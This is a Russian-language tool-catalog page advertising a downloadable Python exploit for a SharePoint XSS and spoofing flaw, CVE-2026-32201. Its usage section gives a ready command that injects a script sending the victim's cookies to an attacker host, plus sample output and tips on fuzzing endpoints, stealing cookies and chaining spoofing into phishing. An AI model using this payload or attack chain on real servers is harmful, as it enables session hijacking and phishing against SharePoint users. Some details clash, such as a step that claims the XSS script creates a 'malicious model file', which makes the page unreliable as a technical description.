Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-32201-exploit — Python-эксплойт для CVE-2026-32201, отражённый XSS в Microsoft SharePoint Server, позволяющий неаутентифицированный спуфинг и модификацию данных с помощью специально сформированных HTTP-запросов. | Kitploit
Инструменты/GitHubGitHub/b1tbit/cve-2026-32201-exploit
Инструменты фишингаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubb1tbit/cve-2026-32201-exploit

CVE-2026-32201-exploit

Python-эксплойт для CVE-2026-32201, отражённый XSS в Microsoft SharePoint Server, позволяющий неаутентифицированный спуфинг и модификацию данных с помощью специально сформированных HTTP-запросов.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
14 месяцев назадЕщё не проверено

Обзор

Python-эксплойт для CVE-2026-32201 — некорректная проверка входных данных в Microsoft SharePoint Server, позволяющая неаутентифицированную сетевую подмену (C:L/I:L).

  • Затронуты: SharePoint Server 2016 Enterprise, 2019, Subscription Edition < 16.0.19725.20210;
  • Вектор: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N;
  • Воздействие: просмотр/изменение конфиденциальных данных через поддельные уведомления/документы.

Возможности

  1. Определение версии SharePoint.
  2. Сформированный POST-запрос для обхода проверки входных данных (sender_override).
  3. Настраиваемая полезная нагрузка (отправитель, получатель, тема, сообщение с XSS).
  4. Анализ ответа для проверки.

Использование

  1. Сохраните файл как exploit.py
  2. Запустите его для создания вредоносного файла модели:
root@kitploit:~
python3 exploit.py https://sharepoint.target.com \
  --recipient [email protected] \
  --sender "[email protected]" \
  --message "<script>fetch('http://attacker.com/?c='+document.cookie)</script>" \
  --endpoint /_layouts/15/notify.aspx

Пример вывода:

root@kitploit:~
[+] SharePoint обнаружен.
[*] Отправка поддельного запроса на https://target.com/_layouts/15/notify.aspx
[+] Статус: 200
[+] Возможный успех: проверьте журналы/почту цели на наличие поддельного содержимого.

Настройка

  • Фаззинг конечных точек: ffuf -u https://target.com/FUZZ -w sharepoint-layouts.txt
  • XSS-полезная нагрузка: добавьте JS в --message для кражи cookie
  • Связывание: подмена → фишинговая ссылка → обход аутентификации

Проверка

  • Индикаторы успеха: 200 OK + «sent/success» в ответе
  • На стороне сервера: проверьте журналы ULS/журналы IIS на предмет аномальных запросов
  • Воздействие: отслеживайте электронную почту/документы на предмет поддельного отправителя, тестируйте изменение данных
Скачать инструмент